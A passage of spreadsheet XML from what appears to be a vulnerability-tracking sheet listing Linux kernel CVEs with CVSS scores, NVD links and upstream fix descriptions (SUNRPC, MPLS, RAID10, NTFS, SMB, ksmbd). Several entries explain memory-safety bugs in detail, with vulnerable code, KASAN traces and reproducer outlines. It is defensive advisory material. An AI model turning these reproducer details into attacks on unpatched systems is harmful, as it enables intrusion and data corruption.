service threads.  Requests that lose the NULL transition in
xprt_enqueue_bc_request() are released through the normal backchannel
free path after balancing bc_slot_count.  Finally, drain any remaining
sv_cb_list requests after the callback threads have stopped and before
svc_destroy() frees the service.</t>
        </is>
      </c>
      <c r="S66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89546</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89550</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr"/>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr"/>
      <c r="Q67" s="5" t="inlineStr"/>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
SUNRPC: svcauth_gss: enforce krb5 token minimum length
svcauth_gss_unwrap_priv() validates only an upper bound on the
wire-supplied opaque length before handing the buffer to
gss_unwrap():
    if (len &gt; xdr_stream_remaining(xdr))
            goto unwrap_failed;
    offset = xdr_stream_pos(xdr);
    ...
    maj_stat = gss_unwrap(ctx, offset, offset + len, buf);
The wire value `len` flows unchanged as the upper bound into the
krb5 unwrap path, so a len in [0, 16] passes this check and is
handed to gss_unwrap(). For a krb5 v2 context that lands in
gss_krb5_unwrap_v2(), which reads the 16-byte RFC 4121 token
header fields at ptr+4 and ptr+6 and then calls rotate_left()
before any integrity check. With a sub-header length the header
reads run past the token, and _rotate_left()'s `shift %= buf-&gt;len`
path can divide by zero when buf-&gt;len has been driven to zero by
the truncated token. A header-only token (len == 16) is equally
invalid: with a non-zero RRC field and the opaque blob ending at
the XDR buffer boundary, rotate_left() builds a zero-length
subbuffer, reaching the same division.
Reject the token at the server entry point before it reaches the
krb5 unwrap core. A valid sealed RFC 4121 token must contain
the 16-byte header plus at least some encrypted payload.
Fix by adding a minimum-length check immediately after the
existing upper-bound check:
    if (len &lt;= GSS_KRB5_TOK_HDR_LEN)
            goto unwrap_failed;</t>
        </is>
      </c>
      <c r="S67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89550</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89551</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr"/>
      <c r="K68" s="5" t="inlineStr"/>
      <c r="L68" s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr"/>
      <c r="Q68" s="5" t="inlineStr"/>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
SUNRPC: xdr_buf_trim: clamp buf-&gt;len to avoid underflow
xdr_buf_trim() trims `len` bytes from the tail of an xdr_buf by
walking the tail, pages, and head iovecs.  Each per-section step
uses min_t() so it never removes more bytes than that section
holds, but the final accounting at the fix_len label subtracts the
total bytes actually consumed from buf-&gt;len without any clamp:
    fix_len:
            buf-&gt;len -= (len - trim);
When the caller has set buf-&gt;len to a value smaller than the sum
of the iov_lens, (len - trim) can exceed buf-&gt;len and the unsigned
subtraction wraps to near UINT_MAX.  gss_krb5_unwrap_v2() reaches
xdr_buf_trim() in exactly that state:
    buf-&gt;head[0].iov_len -= GSS_KRB5_TOK_HDR_LEN + headskip;
    buf-&gt;len = len - (GSS_KRB5_TOK_HDR_LEN + headskip);
    xdr_buf_trim(buf, ec + GSS_KRB5_TOK_HDR_LEN + tailskip);
buf-&gt;len is a small wire-derived value while the iov_lens are at
page scale, so the per-section loops legitimately consume far more
bytes than buf-&gt;len records.  The wrapped buf-&gt;len then propagates
as the authoritative stream bound into every downstream XDR
decoder.
Fix by clamping the decrement so buf-&gt;len bottoms out at zero:
    buf-&gt;len -= min_t(unsigned int, buf-&gt;len, len - trim);
On the normal path where the iov_lens sum to buf-&gt;len, (len - trim)
is always &lt;= buf-&gt;len and the result is identical to before.  No
callers change behavior outside the underflow case.</t>
        </is>
      </c>
      <c r="S68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89551</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89555</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr"/>
      <c r="K69" s="5" t="inlineStr"/>
      <c r="L69" s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr"/>
      <c r="Q69" s="5" t="inlineStr"/>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mpls: reload header after pskb_may_pull()
mpls_select_multipath() calls mpls_multipath_hash() to choose a nexthop
when an MPLS route has multiple nexthops.  While walking the MPLS label
stack, the hash routine caches hdr for the current label.  After finding
the bottom-of-stack label, it calls pskb_may_pull() before reading the
inner IP header.
If an skb is constructed with the inner IP header in nonlinear data and
insufficient tailroom in the linear head, pskb_may_pull() calls
pskb_expand_head() to replace the skb head and free the old one.  This
leaves hdr pointing to freed memory.  The IPv6 path can invalidate hdr
again when it performs a second pull for the larger header.
The issue was found through static analysis.  A reproducer sending a legal
Geneve packet through a bareudp/MPLS multipath setup triggered the same
KASAN report in 2 of 2 unpatched runs:
  BUG: KASAN: slab-use-after-free in mpls_select_multipath
  Read of size 1 at addr ffff88800ecc6e20 by task ksoftirqd/1/23
  Call Trace:
   mpls_select_multipath
   mpls_forward
   __netif_receive_skb_list_core
   netif_receive_skb_list_internal
   napi_complete_done
   gro_cell_poll
   __napi_poll
   net_rx_action
  Freed by task 23:
   kfree
   pskb_expand_head
   __pskb_pull_tail
   mpls_select_multipath
Reload hdr from the current skb head after each successful pull before
deriving the inner IPv4 or IPv6 header pointer.</t>
        </is>
      </c>
      <c r="S69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89555</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89558</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr"/>
      <c r="K70" s="5" t="inlineStr"/>
      <c r="L70" s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr"/>
      <c r="Q70" s="5" t="inlineStr"/>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
md/raid10: fix still_degraded being inverted in raid10_sync_request()
Commit fe6a19d40ceb ("md/md-bitmap: merge md_bitmap_start_sync() into
bitmap_operations") converted still_degraded from int to bool, but
inverted the assignment in the loop that checks whether the array will
still be degraded after the current device is recovered:
"still_degraded = 1" became "still_degraded = false".
As a result, recovering a device while another mirror is still missing
calls md_bitmap_start_sync() with degraded == false, which clears bitmap
bits that the still-missing device needs.  When that device is re-added,
its bitmap-based recovery finds the bits already cleared and skips every
region written while the array was degraded, so it is marked In_sync
while holding stale data: silent corruption.
Reproducer (raid10 near=2, 4 disks, internal bitmap):
 - fail and remove one disk of each mirror pair
 - write to the degraded array
 - re-add both disks and let recovery finish
 - "check" reports mismatch_cnt=262272 after 256 MiB of degraded
   writes and file contents differ; the second disk's "recovery"
   completes in milliseconds because everything is skipped
The same conversion in raid1 got it right (still_degraded = true).
Restore the correct value.</t>
        </is>
      </c>
      <c r="S70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89558</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89610</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr"/>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr"/>
      <c r="Q71" s="5" t="inlineStr"/>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: verify run length exceeding volume boundary
The mapping pairs decoder validates that the starting LCN is within the
volume but does not check if the run extends beyond the volume boundary.
A malformed NTFS image with a crafted mapping pairs array could cause
the kernel to access memory beyond the volume boundary, potentially leading
to memory corruption and privilege escalation.
Add validation to ensure lcn + length stays within nr_clusters.</t>
        </is>
      </c>
      <c r="S71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89610</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89611</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr"/>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr"/>
      <c r="Q72" s="5" t="inlineStr"/>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: validate non-resident attribute offsets
ntfs_attr_update_meta() shifts the attribute name when converting between
non-sparse and sparse attributes. Converting to sparse also adds the
compressed_size field before the name and mapping pairs, requiring eight
additional bytes in the attribute record.
However, the validator does not check that name_offset is within safe
boundaries for these operations or that the additional space is available.
A malicious MFT record could set name_offset such that:
1. The name is positioned at the very end of a non-sparse attribute.
   Converting to sparse would shift the name forward by 8 bytes,
   writing beyond the attribute boundary.
2. The name overlaps with the mapping pairs, causing corruption during
   conversion.
Add validation to ensure:
- For named attributes, name_offset is within valid bounds
- Name does not extend beyond the attribute or overlap with mapping pairs
- For non-sparse, non-compressed attributes, eight bytes are available
  after mapping_pairs_offset for the compressed_size field
The space check also covers unnamed attributes, for which name_offset = 0
is valid and no name range needs to be checked.</t>
        </is>
      </c>
      <c r="S72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89611</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89612</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr"/>
      <c r="K73" s="5" t="inlineStr"/>
      <c r="L73" s="5" t="inlineStr"/>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr"/>
      <c r="Q73" s="5" t="inlineStr"/>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: reject invalid MFT LCNs from boot sector
The NTFS boot sector stores the MFT and MFTMirr locations as unsigned
64-bit LCNs, but parse_ntfs_boot_sector() decoded them into an s64.
A crafted high-bit value could therefore become negative and pass
the existing upper-bound check. The invalid value then propagated into
the MFT zone allocator and could result in an out-of-bounds access to
lcn_empty_bits_per_page.</t>
        </is>
      </c>
      <c r="S73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89612</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89613</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr"/>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr"/>
      <c r="Q74" s="5" t="inlineStr"/>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: reject invalid empty mapping pairs
Reject an attribute with empty mapping pairs if it has inconsistent
highest VCN and size.</t>
        </is>
      </c>
      <c r="S74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89613</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89614</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr"/>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr"/>
      <c r="Q75" s="5" t="inlineStr"/>
      <c r="R75" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: bound the free-cluster bitmap scan to the volume
vol-&gt;lcn_empty_bits_per_page is sized from vol-&gt;nr_clusters at mount, but
ntfs_cluster_alloc() bounds its scan of that array by the size of $Bitmap.
Those are independent on-disk quantities and the mount-time check only
rejects a $Bitmap that is too small, so an image whose $Bitmap covers more
clusters than the volume has lets the scan index past the array.  A run
whose LCN lies in that gap takes the allocator straight there, since the
caller passes the file's own last LCN as its locality hint.  KASAN reports
a slab out-of-bounds read when a file on such a volume is extended.
Clamp the scan to what that array covers, mirroring the max_index
calculation the mount-time scan already uses, and reject a decoded LCN
at or beyond nr_clusters in the mapping pairs decoder.  Conforming
volumes are unaffected.</t>
        </is>
      </c>
      <c r="S75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89614</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89633</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr"/>
      <c r="K76" s="5" t="inlineStr"/>
      <c r="L76" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr"/>
      <c r="Q76" s="5" t="inlineStr"/>
      <c r="R76" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: fix OOB read/write from unvalidated DataOffset in coalesce_t2()
coalesce_t2() computes data pointers directly from server-supplied
DataOffset fields with no validation against buffer bounds:
  data_area_of_tgt = (char *)&amp;pSMBt-&gt;hdr.Protocol +
                     get_unaligned_le16(&amp;pSMBt-&gt;t2_rsp.DataOffset);
  data_area_of_src = (char *)&amp;pSMBs-&gt;hdr.Protocol +
                     get_unaligned_le16(&amp;pSMBs-&gt;t2_rsp.DataOffset);
  data_area_of_tgt += total_in_tgt;
  ...
  memcpy(data_area_of_tgt, data_area_of_src, total_in_src);
A small DataOffset can push a pointer below the actual byte area,
overwriting header fields; a large one can push it past the buffer
end, causing out-of-bounds heap reads (source) or writes (target).
The BCC overflow guard does not prevent this: BCC reflects how much
data is present, while DataOffset controls where in the buffer it
starts.
The "validate target area" comment present since the function was
first written in 2005 was a placeholder that was never implemented.
Add lower- and upper-bound checks for both data pointers before the
memcpy, and before any target header fields are modified.</t>
        </is>
      </c>
      <c r="S76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89633</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89635</t>
        </is>
      </c>
      <c r="D77" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr"/>
      <c r="K77" s="5" t="inlineStr"/>
      <c r="L77" s="5" t="inlineStr"/>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr"/>
      <c r="Q77" s="5" t="inlineStr"/>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: only rebind the reopened file's own oplock on durable reconnect
ksmbd_reopen_durable_fd() walks the inode's m_op_list and rebinds every
detached oplock to the reconnecting session:
	list_for_each_entry_rcu(op, &amp;ci-&gt;m_op_list, op_entry,
				lockdep_is_held(&amp;ci-&gt;m_lock)) {
		if (op-&gt;conn)
			continue;
		op-&gt;conn = ksmbd_conn_get(fp-&gt;conn);
		op-&gt;sess = work-&gt;sess;
	}
The only key is op-&gt;conn == NULL, which every detached durable handle on
that inode matches, not just the one owned by fp.  When two sessions hold
durable handles on the same file and both disconnect, reconnecting one of
them adopts the other session's oplock: op-&gt;sess is overwritten with the
reconnecting session without taking a reference on it, while op-&gt;conn
pins the connection.
The sibling teardown path, session_fd_check(), keys on the identity of
the connection being torn down (op-&gt;conn == conn) rather than on shared
state, and so does not have this problem.
Once the adopting session is destroyed, ksmbd_session_destroy() frees it
while the foreign oplock still points at it.  The reader in
ksmbd_close_fd_app_instance_id() validates only opinfo-&gt;conn, which is
still live thanks to the reference taken above, and then dereferences the
stale session:
	if (!opinfo-&gt;conn) {
		up_read(&amp;fp-&gt;f_ci-&gt;m_lock);
		goto out;
	}
	ft = &amp;opinfo-&gt;sess-&gt;file_table;
	write_lock(&amp;ft-&gt;lock);
  BUG: KASAN: slab-use-after-free in _raw_write_lock+0x74/0xd0
  Write of size 4 at addr ffff88810a970528 by task kworker/0:0/9
  Workqueue: ksmbd-io handle_ksmbd_work
  Call Trace:
   _raw_write_lock+0x74/0xd0
   ksmbd_close_fd_app_instance_id+0x183/0x410
   smb2_open+0x1346/0x4430
   handle_ksmbd_work+0x2bb/0x7b0
Reached from an authenticated session against a share with the default
durable-handle and oplock configuration: two sessions open the same file
with a durable-v2 handle and an RH lease under distinct AppInstanceIds,
both log off, one reconnects with DH2C, and a later durable-v2 create
carrying the other AppInstanceId walks into the freed session.
Constrain the loop to the oplock owned by the file being reopened.</t>
        </is>
      </c>
      <c r="S77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89635</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89636</t>
        </is>
      </c>
      <c r="D78" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr"/>
      <c r="K78" s="5" t="inlineStr"/>
      <c r="L78" s="5" t="inlineStr"/>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr"/>
      <c r="Q78" s="5" t="inlineStr"/>
      <c r="R78" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: clear ce-&gt;tgthint in free_tgts()
When free_tgts() frees all structures in ce-&gt;tlist, ce-&gt;tgthint
is left pointing to one of the freed cache_dfs_tgt structures.
If ce-&gt;tgthint is not reset before it is used later, it results
in a use-after-free.
Set ce-&gt;tgthint to NULL in free_tgts() after the elements are
freed to reflect that no elements remain.</t>
        </is>
      </c>
      <c r="S78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89636</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89637</t>
        </is>
      </c>
      <c r="D79" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr"/>
      <c r="K79" s="5" t="inlineStr"/>
      <c r="L79" s="5" t="inlineStr"/>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
